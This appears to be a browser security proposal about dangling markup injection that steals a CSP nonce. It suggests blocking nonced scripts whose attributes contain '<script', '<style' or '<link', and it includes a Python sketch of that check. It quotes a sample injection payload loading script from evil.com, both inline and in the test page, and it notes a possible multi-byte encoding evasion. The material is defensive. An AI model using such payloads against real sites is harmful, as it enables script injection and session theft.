Context: "Dangling markup injection" can allow attackers to insert unterminated script elements which will consume markup until they encounter a trusted script element with a valid nonce and "steal" the nonce value from a legitimate script, allowing malicious script execution:
http://blog.innerht.ml/csp-2015/#danglingmarkupinjection
http://lcamtuf.coredump.cx/postxss/ (Section 2.1)
This could be prevented by user agents in the following way:
IF the page defines a CSP with a nonce and the browser sees a script with a valid nonce, THEN: do not execute that script if any of its attribute values contain the string "<script" (case-insensitive).

The reason this works is that an attacker with an injection point before a legitimately nonced <script> will have to consume markup until it reaches its nonce attribute. This means that the opening tag of the legitimate <script> element (i.e. "<script") will have to appear somewhere between the attacker-injected <script> and the real nonce attribute:

[XSS]<script src=//evil.com injected="[/XSS] <b>markup</b> <script id="foo" nonce="nonce">

In this case, it would be the attacker-controlled "injected" attribute that would contain the "<script" substring; in general, the attacker will not be able to avoid having this string present somewhere in the attributes of their injected element. The browser can use this fact to prevent injected scripts from executing, without affecting any legitimate script (which shouldn't have such unescaped strings in their attributes).
Two caveats:

1. The check should also look for "<style" and "<link", which also support nonces -- it would protect pages which use the same nonce for script-src and style-src.

2. If there is an injection point before a legitimately nonced <script> tag, and the page allows improperly-encoded output, it might be possible to use multi-byte encodings to attempt to evade this check.
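The proposed check and the first caveat, worked through as an added example (not code from the original report): Python's standard html.parser tokenizes the attacker's unterminated tag the same way the text describes, so the swallowed "<script" ends up inside the injected attribute value, where the check can see it. The sample page, the marker list and all function names are my own constructions.

```python
from html.parser import HTMLParser

# Substrings whose presence in an attribute value betrays an unterminated injected
# tag that swallowed a nonced element; "<style"/"<link" follow the first caveat.
HIJACK_MARKERS = ("<script", "<style", "<link")


def attributes_hijack_nonce(attrs):
    """True if any attribute value contains a marker, compared case-insensitively."""
    for _name, value in attrs:
        if value is None:          # boolean attribute, nothing to inspect
            continue
        lowered = value.lower()
        if any(marker in lowered for marker in HIJACK_MARKERS):
            return True
    return False


class NoncedScriptAuditor(HTMLParser):
    """Records, for every <script> start tag, whether the nonce check lets it run."""

    def __init__(self, expected_nonce):
        super().__init__()
        self.expected_nonce = expected_nonce
        self.decisions = []  # list of (src or id, allowed)

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attr_map = dict(attrs)
        label = attr_map.get("src") or attr_map.get("id")
        # A script must carry the right nonce AND have marker-free attribute values.
        allowed = (attr_map.get("nonce") == self.expected_nonce
                   and not attributes_hijack_nonce(attrs))
        self.decisions.append((label, allowed))


def audit(html, nonce):
    """Parse a page and return the per-script decisions in document order."""
    parser = NoncedScriptAuditor(nonce)
    parser.feed(html)
    parser.close()
    return parser.decisions


# Constructed sample page: the injected <script never closes its injected="..."
# value, so the tokenizer swallows the real <script id="foo" nonce="nonce"> into
# that attribute. The later script "bar" is untouched and must still run.
SAMPLE_PAGE = (
    '<p>Hello <script src=//evil.com injected="</p>'
    '<b>markup</b> <script id="foo" nonce="nonce">legit()</script>'
    '<script id="bar" nonce="nonce">alsoLegit()</script>'
)
```

Running audit(SAMPLE_PAGE, "nonce") yields the injected script blocked and "bar" allowed; note the parser emits no "foo" element at all, because it was consumed into the attacker's attribute.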